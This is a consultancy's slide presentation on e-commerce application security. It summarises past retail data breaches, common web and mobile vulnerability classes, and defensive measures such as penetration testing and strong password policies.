E-commerce Application SecurityWays to secure your application from hackers

Building a software is easy, building a secure software is difficult….Vulnerabilities are inevitable, hacking is not…

What is it all about ??

• Importance of security in e-commerce

• Major attacks on e-commerce applications

• Common issues and vulnerabilities in applications

• What makes attackers target your application?

• Vulnerabilities that might be present in your application

• How do hackers attack your application?

• Do's and Dont's to improve application security

You can also view a recorded session of this presentation here!

How security affects e-commerce?

• Tarnishes company’s reputation in public

• Huge financial loss due to post breach activities like email notification, patching, business loss etc. Image

• One breach invites many other hackers

• Loss of costumers trust

• Loss of business

You can also view a recorded session of this presentation here!

Ecommerce Hacks

What does eBay, Zappos (Amazon), Dominos and Starbucks have in common?

They all suffered huge data breaches in the last few years. For more info checkout: Link

eBay Data Breach

• Attackers compromised a small number of employee log-in credentials, allowing unauthorized access to eBay’s corporate network

• The attack obtained user information such as dates of birth, names, email addresses, phone numbers, residential addresses and passwords (encrypted)

Lessons to learn from this hack:

• Centralize Application Management• Secure Employee Personal

Accounts• Ensure strong password policy• Proactive stand for security

You can also view a recorded session of this presentation here!

Starbucks Data Breach• Starbucks mobile app was hacked twice in a period of few months

• Hackers stole money from several Starbucks customers by gaining access to their credit card information

• Criminals used Starbucks accounts to access consumers’ linked credit cards. They could steal hundreds of dollars in a matter of minutes.

Lessons to learn from this hack:

• Securing the mobile application and backend API

• Proactive measure against the cyber attacks, like Penetration testing and vulnerability assessments

You can also view a recorded session of this presentation here!

Commonly Exploited Vulnerabilities

• Injection Attacks like Sql Injection, leads to critical data loss

• Improper implementation of payment system and logical vulnerabilities• X0RC0NF presentation: Link

• Insecure mobile application and backend API server

• Insecure direct object reference: Unrestricted access to subdomains

• Privilege Escalation and authorization bypass

• Cross Site Scripting: Hijacking accounts

• Improper Policy implementations, like weak passwords, insecure storage

You can also view a recorded session of this presentation here!

Injection Attacks

Injection attacks can result in data loss or corruption, lack of accountability, denial of access or complete host takeover.

For e.g., Sql injection may lead to total compromise of your database.

You can also view a recorded session of this presentation here!

Payment system and logical vulnerabilities

Payment gateways are often

found to be insecurely implemented that may lead to attacks like Payment forgery or restrictions bypass.

Logical vulnerabilities are hard

to discover but have huge impact on business.

You can also view a recorded session of this presentation here!

Insecure mobile application and backend API server

Protecting only the web

applications from hackers is not sufficient.

With the increased use of smart phones and tablets, the internet is flooded with mobile applications. These applications must also be secured from attacks along with proper implementations of API calls.

You can also view a recorded session of this presentation here!

Insecure direct object reference

Insecure direct object

reference means referencing an object such as a page or a file directly that was not meant to be directly referenced.

Such insecure entry points are often discovered in applications while performing a pentest.

You can also view a recorded session of this presentation here!

Privilege Escalation and authorization bypass

Privilege Escalation enables

the attacker to compromise an user’s account by accessing those resources that are meant to be private.

If the compromised account is that of an administrator, the attacker now controls the admin functionalities.

You can also view a recorded session of this presentation here!

Cross Site Scripting

Attackers can execute scripts

in a victim’s browser to hijack user sessions and steal cookies.

This is one of the most common attack vectors that attackers use to steal credentials/tokens and perform targeted attacks

You can also view a recorded session of this presentation here!

Improper Policy implementations- A Weak Password

A weak password policy that

allows the users to set a weak password makes the application vulnerable to attacks such as brute force and Password guessing.

You can also view a recorded session of this presentation here!

Hacker’s Jackpot

• Credit card data, personal info like, phone number, address can be sold in black market

• Personal Info can be used for blackmailing and phishing

• Un-encrypted database can be sold very easily to competitors

“If you're a @dominos_pizzafr customer, u may want to know that we have offered Domino's not to publish your data in exchange for €30,000,”

-Tweet by hackers after Dominos Hack

Financial services are amongst top 3 of most attacked services on internet

-2015-DBIR (Verizon)

You can also view a recorded session of this presentation here!

What Hacker’s look for?

• Unpatched servers, or network devices• Insecure vulnerable implementation of known software's like

WordPress• Older/outdated software being used, with known publicly available

exploits• Common vulnerabilities like CSRF, XSS, lack of HTTPS, brute-forcing

etc.• Subdomains without proper authorization or public sensitive data

“In our experience, 30-45% or applications have one or more than one critical vulnerability.”47% of all breaches in 2015 study were caused by malicious or criminal attacks.

-DBIR (Verizon)

You can also view a recorded session of this presentation here!

How hackers attack?

• Choosing the weakest link to attack, web application, unpatched servers, employee credentials etc.

• Finding the vulnerability in web application to steal credentials or users and exploit

• One XSS in any page may lead to admin account compromise

• Search for any vulnerable implementation of known software like WordPress or Magento

• Hacking a weak WordPress blog is way easier than hacking the website itself

• Data exfiltration is done in an stealth mode

You can also view a recorded session of this presentation here!

Safeguarding

• Proactively discover and remediate the application vulnerabilities in a timely manner

• A good penetration test will discover logical vulnerabilities and authorization issues too

• Make sure to assess all the subdomains, servers and all accessible portals. It’s not hidden if you have not provided a direct link – Doing a small Google search will reveal many sub-domains “site:xyz.com -www”

• Ensure strong encryption and policy to be implemented on application and network

• Easy to find vulnerabilities affect the most, if not fixed. XSS, CSRF, file uploads etc.

• Always audit the application server together with the web application

• Mobile applications are becoming the easy target for hackers, make sure to assess it for vulnerabilities

It might be dark, but the light is not very far

You can also view a recorded session of this presentation here!

Contact us

Our Office

Client Location

Here’s how TOTHENEW helps in building an E-commerce for its customers!

Click Here To Know More!

Have more queries related to E-commerce?

Talk To Our Experts!